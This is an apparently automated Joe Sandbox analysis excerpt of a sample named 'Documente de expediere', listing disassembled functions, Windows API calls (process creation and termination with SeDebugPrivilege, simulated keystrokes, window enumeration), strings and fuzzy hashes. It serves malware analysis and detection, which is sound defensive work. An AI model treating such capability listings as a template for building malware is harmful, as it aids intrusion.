                                                • Opcode Fuzzy Hash: 4bac9a40ceb4371e8c5f9de824b3dbd24aa74a389eef22ce4481c593f27caa47
                                                • Instruction Fuzzy Hash: 6B319F75600308EBDB15EF14EC84BF977BAAB16792F10C015FA099A3E0D7B89D41CB54
                                                Function 00709428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: ,,r$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-2506191893
                                                • Opcode ID: 7c37de09b02ec78ff4313b24dcd145ea5596c262c546c38adf990a88a16448c0
                                                • Instruction ID: 8e3e67663b39227ba2be49ba288c6c9ad985ee5e14e8515bb03da06ec83a84a1
                                                • Opcode Fuzzy Hash: 7c37de09b02ec78ff4313b24dcd145ea5596c262c546c38adf990a88a16448c0
                                                • Instruction Fuzzy Hash: 6F918C71A00219EBDF24DFA5CC44FAEB7B8EF45310F108259F615AB282D7789941CBA4
                                                Function 006EA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnumChildWindows.USER32(?,006EAA64), ref: 006EA9A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                • Opcode ID: c494039843d7ea1383c3be7b43f1629f8ce447d0ef61a37b93f2f1cd4630398d
                                                • Instruction ID: 54681b0401b3f2d4c27ece616c5bb3cebd71563352d84f11314ed0124e6f3827
                                                • Opcode Fuzzy Hash: c494039843d7ea1383c3be7b43f1629f8ce447d0ef61a37b93f2f1cd4630398d
                                                • Instruction Fuzzy Hash: 5891C770601346ABDF48DFA1C481BEAFB76BF04300F51812DD58AA7242DF30799ACB95
                                                Function 00692E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 00692EAE
                                                  • Part of subcall function 00691DB3: GetClientRect.USER32(?,?), ref: 00691DDC
                                                  • Part of subcall function 00691DB3: GetWindowRect.USER32(?,?), ref: 00691E1D
                                                  • Part of subcall function 00691DB3: ScreenToClient.USER32(?,?), ref: 00691E45
                                                • GetDC.USER32 ref: 006CCF82
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006CCF95
                                                • SelectObject.GDI32(00000000,00000000), ref: 006CCFA3
                                                • SelectObject.GDI32(00000000,00000000), ref: 006CCFB8
                                                • ReleaseDC.USER32(?,00000000), ref: 006CCFC0
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006CD04B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: 989a1713afc2602fbb17c8c573c774dd64b255d1941428db0ebc1d9893f3fcee
                                                • Instruction ID: 108d4668f243b762d85bdb9d92fb0a533dd187a2b8fa8262759df0c120bcfe77
                                                • Opcode Fuzzy Hash: 989a1713afc2602fbb17c8c573c774dd64b255d1941428db0ebc1d9893f3fcee
                                                • Instruction Fuzzy Hash: A6719D30500205EFCF218F68C895EFA7BBBFF49364F14826EED555A2A6D7318842DB60
                                                Function 00708F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0071F910), ref: 0070903D
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0071F910), ref: 00709071
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007091EB
                                                • SysFreeString.OLEAUT32(?), ref: 00709215
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                • Opcode ID: 80927e7df350a64bb7fd71a534390146c2835fd0a8b6a1e60a5a13c307c0c9a2
                                                • Instruction ID: 03b75446a028d98d5ed5df7ca7472a24c4d7fc5da4945f182b97c10a19ccb02b
                                                • Opcode Fuzzy Hash: 80927e7df350a64bb7fd71a534390146c2835fd0a8b6a1e60a5a13c307c0c9a2
                                                • Instruction Fuzzy Hash: D1F10971A00209EFDF04DF94C888EAEB7B9FF49314F108559FA15AB291DB35AE45CB50
                                                Function 0070F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0070F9C9
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070FB5C
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0070FB80
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070FBC0
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0070FBE2
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070FD5E
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0070FD90
                                                • CloseHandle.KERNEL32(?), ref: 0070FDBF
                                                • CloseHandle.KERNEL32(?), ref: 0070FE36
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                • Opcode ID: cabb3c3e825616bfcae62a055278e751aba17730ccff4fb0799750a8cfe7f394
                                                • Instruction ID: 70bad4b3686520ce1d6df72169c8c24ea7f2dab72a17176a3e0747fd64bdbe3d
                                                • Opcode Fuzzy Hash: cabb3c3e825616bfcae62a055278e751aba17730ccff4fb0799750a8cfe7f394
                                                • Instruction Fuzzy Hash: F7E1D271204301DFCB64EF24C891A6ABBE6BF85314F14856DF8998B6E2CB35EC41CB56
                                                Function 006F4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006F38D3,?), ref: 006F48C7
                                                  • Part of subcall function 006F48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006F38D3,?), ref: 006F48E0
                                                  • Part of subcall function 006F4CD3: GetFileAttributesW.KERNEL32(?,006F3947), ref: 006F4CD4
                                                • lstrcmpiW.KERNEL32(?,?), ref: 006F4FE2
                                                • _wcscmp.LIBCMT ref: 006F4FFC
                                                • MoveFileW.KERNEL32(?,?), ref: 006F5017
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                • Opcode ID: 1ddfeac077567fcf691254b0cfc02b2da19fb9ec2c0e4aa4e69da9051df3443a
                                                • Instruction ID: c49d7263566db8703dc9698bc3c5e2dce37c62b6fdb753f02e2925bc3afb1333
                                                • Opcode Fuzzy Hash: 1ddfeac077567fcf691254b0cfc02b2da19fb9ec2c0e4aa4e69da9051df3443a
                                                • Instruction Fuzzy Hash: E15177B20087855BC764DB54CC859EFB3EDAF85340F00492EF299D3191EF74E589876A
                                                Function 007188B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0071896E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: ad078a5cbe2ea77d4e065e39b4a9e934e898bcd172bec22ef832cd70e17c4895
                                                • Instruction ID: 0960b8d89b892f5f3a97100f836ae0c31adb6348fd0fd57041732fadbc180fd3
                                                • Opcode Fuzzy Hash: ad078a5cbe2ea77d4e065e39b4a9e934e898bcd172bec22ef832cd70e17c4895
                                                • Instruction Fuzzy Hash: FD518230500204BBDFA09F2CCC89BE97B65AF05354F608116F515E66E1DF79EAC0DB86
                                                Function 00692B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006CC547
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006CC569
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006CC581
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006CC59F
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006CC5C0
                                                • DestroyIcon.USER32(00000000), ref: 006CC5CF
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006CC5EC
                                                • DestroyIcon.USER32(?), ref: 006CC5FB
                                                  • Part of subcall function 0071A71E: DeleteObject.GDI32(00000000), ref: 0071A757
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2819616528-0
                                                • Opcode ID: f139bcff02c370cb32fa22645b6b07c4a5b5d3f22aa18bf0d964ccb9bd443859
                                                • Instruction ID: 15a66c40c2fc8e9385f7c005718d608b6b9d6c4e01444062f36a83ad77a97c48
                                                • Opcode Fuzzy Hash: f139bcff02c370cb32fa22645b6b07c4a5b5d3f22aa18bf0d964ccb9bd443859
                                                • Instruction Fuzzy Hash: CC51577460020AAFDF20DF28CC55FAA37EAEB58324F508528F906976A0DB74E991DB54
                                                Function 006E9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006EAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 006EAE77
                                                  • Part of subcall function 006EAE57: GetCurrentThreadId.KERNEL32 ref: 006EAE7E
                                                  • Part of subcall function 006EAE57: AttachThreadInput.USER32(00000000,?,006E9B65,?,00000001), ref: 006EAE85
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E9B70
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006E9B8D
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006E9B90
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E9B99
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006E9BB7
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E9BBA
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006E9BC3
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006E9BDA
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006E9BDD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: 8d6f19470673af8337659a9846c39c76162fd90fac26a5ca9102cd15f0e1ccf1
                                                • Instruction ID: 1a73a2d8f61c00057cf4926d43ac8d763a2a3d154abefdac08cd551da6bd6ccf
                                                • Opcode Fuzzy Hash: 8d6f19470673af8337659a9846c39c76162fd90fac26a5ca9102cd15f0e1ccf1
                                                • Instruction Fuzzy Hash: 6D11E571550618BEF6106B65DC49FAA3B1DEF4C751F108429F254AB0E0C9F26C10EAA8
                                                Function 006E8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006E8A84,00000B00,?,?), ref: 006E8E0C
                                                • HeapAlloc.KERNEL32(00000000,?,006E8A84,00000B00,?,?), ref: 006E8E13
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006E8A84,00000B00,?,?), ref: 006E8E28
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,006E8A84,00000B00,?,?), ref: 006E8E30
                                                • DuplicateHandle.KERNEL32(00000000,?,006E8A84,00000B00,?,?), ref: 006E8E33
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006E8A84,00000B00,?,?), ref: 006E8E43
                                                • GetCurrentProcess.KERNEL32(006E8A84,00000000,?,006E8A84,00000B00,?,?), ref: 006E8E4B
                                                • DuplicateHandle.KERNEL32(00000000,?,006E8A84,00000B00,?,?), ref: 006E8E4E
                                                • CreateThread.KERNEL32(00000000,00000000,006E8E74,00000000,00000000,00000000), ref: 006E8E68
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 56f5ce3d648e29cb66186a16302adae4ff5f033c966216973c4f1fde37b3459b
                                                • Instruction ID: c433cc73187ff11f0e1d04562aab9c79d37e891d263620a7bc86c7c45ff8a4f8
                                                • Opcode Fuzzy Hash: 56f5ce3d648e29cb66186a16302adae4ff5f033c966216973c4f1fde37b3459b
                                                • Instruction Fuzzy Hash: B701ACB5240348FFE610AB69DC49F9B3B6DEB89711F01C521FA05DB1D1CA759C009A24
                                                Function 00709A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006E7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?,?,006E799D), ref: 006E766F
                                                  • Part of subcall function 006E7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E768A
                                                  • Part of subcall function 006E7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?,?), ref: 006E7698
                                                  • Part of subcall function 006E7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E758C,80070057,?), ref: 006E76A8
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00709B1B
                                                • _memset.LIBCMT ref: 00709B28
                                                • _memset.LIBCMT ref: 00709C6B
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00709C97
                                                • CoTaskMemFree.OLE32(?), ref: 00709CA2
                                                Strings
                                                • NULL Pointer assignment, xrefs: 00709CF0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 1300414916-2785691316
                                                • Opcode ID: b2737a935a1717d7a9a3abf81843afa02aba4ed0fe31374cb16d79659c5d90d0
                                                • Instruction ID: a008327ab66c5b18f4033ba5c0a1fe820b81fb7a4129fe90dad1d1ae3d2c81a7
                                                • Opcode Fuzzy Hash: b2737a935a1717d7a9a3abf81843afa02aba4ed0fe31374cb16d79659c5d90d0
                                                • Instruction Fuzzy Hash: 05914971D00229EBDF10DFA5DC80ADEBBB9EF08310F208159F519A7291DB359A44CFA4
                                                Function 00716FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00717093
                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 007170A7
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007170C1
                                                • _wcscat.LIBCMT ref: 0071711C
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00717133
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00717161
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: b175a793f7fab53b33c10a145f79330845448aa1ad896008fe25142cddfc3fa5
                                                • Instruction ID: f56c33c4b4e7c96ac5d50a3c05b1739dec8635213e98517ccb09b0d04d4ea8ba
                                                • Opcode Fuzzy Hash: b175a793f7fab53b33c10a145f79330845448aa1ad896008fe25142cddfc3fa5
                                                • Instruction Fuzzy Hash: 6741AF70A04308AFEB259F68CC85BEA77B9EF08350F10452AF944A71D2D67A9DC4CB64
                                                Function 0070EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006F3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 006F3EB6
                                                  • Part of subcall function 006F3E91: Process32FirstW.KERNEL32(00000000,?), ref: 006F3EC4
                                                  • Part of subcall function 006F3E91: CloseHandle.KERNEL32(00000000), ref: 006F3F8E
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070ECB8
                                                • GetLastError.KERNEL32 ref: 0070ECCB
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0070ECFA
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0070ED77
                                                • GetLastError.KERNEL32(00000000), ref: 0070ED82
                                                • CloseHandle.KERNEL32(00000000), ref: 0070EDB7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: 687bf375dc98c751077f591d36f64ad53c2e3e3bfa76aa95028a043841657667
                                                • Instruction ID: b87fe9a441dc68ecabeedfb15e6440c9146e28792a8977febbec41ff828a97f5
                                                • Opcode Fuzzy Hash: 687bf375dc98c751077f591d36f64ad53c2e3e3bfa76aa95028a043841657667
                                                • Instruction Fuzzy Hash: 6E41AC713042009FDB14EF28CC95F6EB7A6EF50714F08846DF9469B2D2DB79A804CB9A
                                                Function 006F3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 006F32C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: 2c073a48d4e1e258ef51275f1a619303aafc9d3f93b596089daa6b582918d692
                                                • Instruction ID: 0db803288b130474f762f77d012428a255e9868936332241b3855e540b5e0e0c
                                                • Opcode Fuzzy Hash: 2c073a48d4e1e258ef51275f1a619303aafc9d3f93b596089daa6b582918d692
